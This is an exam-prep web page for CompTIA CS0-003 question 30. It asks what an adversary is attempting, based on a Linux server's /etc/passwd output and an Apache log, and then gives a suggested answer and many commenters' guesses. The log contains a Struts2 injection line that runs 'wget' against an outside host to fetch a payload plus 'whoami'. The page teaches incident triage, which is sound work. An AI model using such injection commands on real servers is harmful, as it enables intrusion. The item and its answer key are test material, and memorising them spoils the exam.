Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

CompTIA CS0-003 Exam - Topic 3 Question 30 Discussion

Actual exam question for CompTIA's CS0-003 exam
Question #: 30
Topic #: 3
[All CS0-003 Questions]

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Show Suggested Answer Hide Answer
Suggested Answer: B

The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.


by Van at Sep 19, 2024, 04:13 AM

Limited Time Offer

25%

Off

Get Premium CS0-003 Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

0/2000 characters
Submit Cancel
Frederica
4 months ago
Why would they use wget for that? Seems odd.
upvoted 0 times
...
Gianna
5 months ago
I think it's more about sending a beacon, not a backdoor.
upvoted 0 times
...
Roxane
5 months ago
Wait, is that a backdoor attempt with zsh? Sounds sketchy.
upvoted 0 times
...
Frank
5 months ago
Definitely B, that service account is wide open!
upvoted 0 times
...
Gussie
5 months ago
Looks like they're trying to execute commands via the http user.
upvoted 0 times
...
Jettie
6 months ago
I think the warning about parsing requests indicates some sort of exploitation attempt, but I can't recall if that directly relates to a denial-of-service attack.
upvoted 0 times
...
Evangelina
6 months ago
I feel like the mention of `wget` in the logs could relate to sending something to a server, but I'm not entirely confident if that means a beacon or something else.
upvoted 0 times
...
Miesha
6 months ago
The log output seems to suggest some sort of command execution attempt. I think option B about executing commands through an unsecured service account might be the right choice.
upvoted 0 times
...
Glynda
6 months ago
I remember we discussed how the `/etc/passwd` file can indicate user accounts, but I'm not sure if the zsh shell is a sign of a backdoor.
upvoted 0 times
...
Amira
6 months ago
This one's got me a bit stumped. The log entries look concerning, but I'm not totally confident in my analysis. I'll have to think this through carefully.
upvoted 0 times
...
Chandra
6 months ago
The output seems to indicate some kind of attempted remote code execution. I'm not entirely sure, but I'll go with option B to be on the safe side.
upvoted 0 times
...
Mose
6 months ago
Okay, I see the attempt to execute commands through the web server. That's definitely the most likely scenario here. I'll select option B.
upvoted 0 times
...
Carri
6 months ago
Hmm, the /etc/passwd file shows some unusual user accounts, and the Apache log has a suspicious-looking request. I think I'll go with option B.
upvoted 0 times
...
Tyisha
6 months ago
This looks like a tricky one. I'll need to carefully analyze the output to determine what the adversary is trying to do.
upvoted 0 times
...
Buck
6 months ago
Hmm, I'm not totally sure about this one. I'll have to think it through carefully to make sure I don't miss anything.
upvoted 0 times
...
Wava
1 year ago
I bet the adversary is trying to 'git' their hands on the server. Get it? Git? Oh, come on, that was a good one!
upvoted 0 times
Therese
1 year ago
Agreed. Let's focus on securing the server and identifying any suspicious activity.
upvoted 0 times
...
Kayleigh
1 year ago
That's a possibility. We should investigate further to prevent any potential damage.
upvoted 0 times
...
Reena
1 year ago
I think they might be trying to execute commands through an unsecured service account.
upvoted 0 times
...
Trinidad
1 year ago
Haha, good one! But seriously, we need to figure out what the adversary is up to.
upvoted 0 times
...
...
Shakira
2 years ago
Denial-of-service attack on the web server? Pff, that's so 2005. Let's see some real hacking skills here, people.
upvoted 0 times
Jules
1 year ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Tresa
1 year ago
Creating a backdoor root account named zsh could also be a possibility. We need to be vigilant and consider all options.
upvoted 0 times
...
Raelene
1 year ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Socorro
1 year ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Filiberto
1 year ago
I agree, executing commands through an unsecured service account seems more like what the adversary is trying to do in this case.
upvoted 0 times
...
Lindsey
1 year ago
Yeah, denial-of-service attacks are old news. Real hackers go for more sophisticated techniques.
upvoted 0 times
...
...
Ozell
2 years ago
A backdoor root account named zsh? That's just lazy. At least try to be a little more creative with your attacks, buddy.
upvoted 0 times
Alona
1 year ago
We should definitely investigate further and secure the server.
upvoted 0 times
...
Daron
1 year ago
Yeah, they're probably trying to gain access and control the server.
upvoted 0 times
...
Renay
1 year ago
Looks like they're trying to execute commands through the http service account.
upvoted 0 times
...
Na
2 years ago
Agreed, using a common username like 'root' is a dead giveaway.
upvoted 0 times
...
...
Pearlene
2 years ago
Wow, a beacon to a command-and-control server? This incident just got a whole lot more serious. We need to act fast!
upvoted 0 times
Yuki
1 year ago
Let's make sure to isolate the server from the network to prevent further damage.
upvoted 0 times
...
Laquita
2 years ago
I agree, we should also check for any other signs of compromise on the server.
upvoted 0 times
...
Louann
2 years ago
We need to analyze the situation carefully before taking any action.
upvoted 0 times
...
...
Trinidad
2 years ago
I believe the adversary is trying to execute commands through an unsecured service account.
upvoted 0 times
...
Eun
2 years ago
I agree with Kaycee, it seems like the most likely scenario based on the output.
upvoted 0 times
...
Delfina
2 years ago
Hmm, looks like someone's trying to execute commands through an unsecured service account. That's not good news at all.
upvoted 0 times
Avery
1 year ago
We need to act fast to prevent any further damage to the server.
upvoted 0 times
...
Sharmaine
2 years ago
I'll check the logs to see if there are any other suspicious activities going on.
upvoted 0 times
...
Amina
2 years ago
We should investigate further to see what commands they are trying to run.
upvoted 0 times
...
Cornell
2 years ago
I agree, it seems like they are trying to exploit the http service account.
upvoted 0 times
...
...
Kaycee
2 years ago
I think the adversary is trying to create a backdoor root account named zsh.
upvoted 0 times
...

Save Cancel